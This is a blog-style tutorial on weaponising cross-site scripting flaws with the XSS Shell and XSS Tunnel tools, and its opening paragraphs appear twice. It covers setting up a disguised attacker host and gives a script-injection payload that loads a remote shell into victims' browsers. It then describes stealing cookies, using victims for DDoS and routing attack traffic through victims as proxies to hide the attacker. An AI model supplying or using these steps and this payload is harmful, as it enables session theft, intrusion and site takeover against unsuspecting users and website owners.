Posted By Maher Bro
Hey awl 2oday I will tell you two neat tools which can be used to leverage common XSS vulnerabilities and allow you to take them to the next level. There are a lot of admins and general techies who don't think XSS vulnerabilities are anything to be concerned about. What can a simple alert box do? Hopefully after today you will look at your code a little harder and have a little more respect for all those pesky XSS finds. This is based on my recent experience in setting these up and seeing the results in real time which lead me to feel the need to share this. Here we go
Create an account at any of your favorite ASP hosting sites, usually a free one will do. Now create and upload a index file to have something for quick checks to see if anything is there (and to throw off suspicion) so your site seems legit. Now we will upload the Path Disclosure Script you downloaded above (path.asp) and then navigate in our browser to it in order to find out what our default install path is so we can setup our db.asp file for connections to our MS-ACCESS database file.
Once
that is done, create a zip file for all of the content in our XSS Shell
folder and name it SSX.zip. Then use your control panel features to
unzip the content to speed up XSS Shell site build-out (otherwise it
takes forever to upload one by one).
TAKING COMMON XSS VULNERABILITIES TO THE NEXT LEVEL
Hey awl 2oday I will tell you two neat tools which can be used to leverage common XSS vulnerabilities and allow you to take them to the next level. There are a lot of admins and general techies who don't think XSS vulnerabilities are anything to be concerned about. What can a simple alert box do? Hopefully after today you will look at your code a little harder and have a little more respect for all those pesky XSS finds. This is based on my recent experience in setting these up and seeing the results in real time which lead me to feel the need to share this. Here we go
Things you need
XSS Shell & XSS Tunnel, both available here in single download
Path Disclosure Script, available here
Create an account at any of your favorite ASP hosting sites, usually a free one will do. Now create and upload a index file to have something for quick checks to see if anything is there (and to throw off suspicion) so your site seems legit. Now we will upload the Path Disclosure Script you downloaded above (path.asp) and then navigate in our browser to it in order to find out what our default install path is so we can setup our db.asp file for connections to our MS-ACCESS database file.
Write
down what you see on the screen, remove file, and then go and edit the
db.asp for XSS Shell for the following line of code, change path to what
you found above:
'// DATABASE CONFIGURATION
Const DBPATH = "X:\path\to\site\install”
Remove the .zip file and the path finder script to clean things up, so it should look something like this once done:
NOTE:
on my host in this test run the “DB” folder was changed to “Db” and the
“admin” folder was changed to “Admin”, so you may need to alter your
scripts after uploading, just play with it a bit until it works for you.
Also note you might need to alter scripts to align as well since your
URL path may be case sensitive to match what control panel reflects,
like in my case.
Now that you have everything uploaded it is time to navigate to the admin panel, you should be able to find it easily at:
You
will login with whatever password you set originally in the
xssshell.asp file. Once you login you are greeted with the XSS Shell
admin panel.
OK,
so things work now to get some victims… If you want to test it out real
quick you can upload the Sample_Victim folder that comes with XSS Shell
download. Just edit the code in the middle of page (comments point it
out) and change to point to your new XSS Shell setup. Once completed,
open up another browser and navigate to the /Sample_Victim/Default.asp
page to activate. Alternatively you can get straight to work by
injecting a form of this script into XSS vulnerable site and then
getting victims to visit:
"><script src="http://yoursite.com/xssshellifany/xssshell.asp"></script>
When you get victims they will appear in the XSS Shell Admin Panel, like so:
From
here you can grab victim cookies, send alert boxes to all victims as
once, use victim browsers for DDoS, etc. If you are good with JavaScript
you can do whatever your skills are limited to as you can add in your
own custom commands and payloads rather easily under the eval(js) module
section. If you want to know more about XSS Shell then please refer to
the developers site as I will now be jumping onward into how we can
utilize the XSS Shell with XSS tunnel to create a Zombie bot for further
attacking, exploiting, whatever….
XSS Shell homepage can be found here, and download includes both XSS Shell and XSS Tunnel: http://labs.portcullis.co.uk/application/xssshell/
OK,
now that we have XSS Shell successfully setup we can extend its
usefulness even further through the help of another tool called XSS
Tunnel. This is a binary program made strictly for Windows. You simply
need to download and open and configure to use our XSS Shell to then
route all traffic we want using our XSS Shell victims as proxies. This
can allow us to bypass IP restrictions should we grab an admin victim,
which can then lead to further privilege escalations from the site admin
panel. It also means we can turn our victims into Zombies and configure
our favorite injection scanners, browsers, etc to use the Zombie victim
as a proxy, meaning all logs on any servers we attack while connected
will reflect our Zombies information and not ours adding yet another
layer of stealth to our future exploitations.
Here is quick run through of the XSS Tunnel configuration. Double click file to run and you’re greeted with this:
We
will need to click on the “OPTIONS” tab to enter our details for
connecting to XSS Shell. Simply enter in the URL path to your XSS Shell
Admin panel, and then enter the password you created for XSS Shell Admin
Panel (xssshell.asp file stores the password if you already forgot).
You
can hit the “TEST SERVER” button once you entered the correct details
to check and confirm it is properly communicating with our XSS Shell.
Upon success you will see message like so:
Now
once you get victims in your XSS Shell you can use them as proxies for
your favorite tools and/or to bypass site restrictions for further
exploitation on the site where the original XSS flaw may have been
found. In order to does this choose the interface or adapter you want to
listen on and then choose the desired port to listen on and use for
proxy functions. If you have something running on 8080 already then just
changes it to meet your need. Transparency setting is purely for the
XSS Tunnel GUI and nothing related to proxy function. Once you have it
how you want you can click on the “START XSS TUNNEL” button near the top
section, once you then enable the proxy function with your tools you
will begin to see the requests flow through the main tab (if you care to
watch or review).
This method can take a common
non-persistent or persistent XSS vulnerability and turn it into a full
site takeover proving that XSS is not something to be simply overlooked.
0 comments:
Post a Comment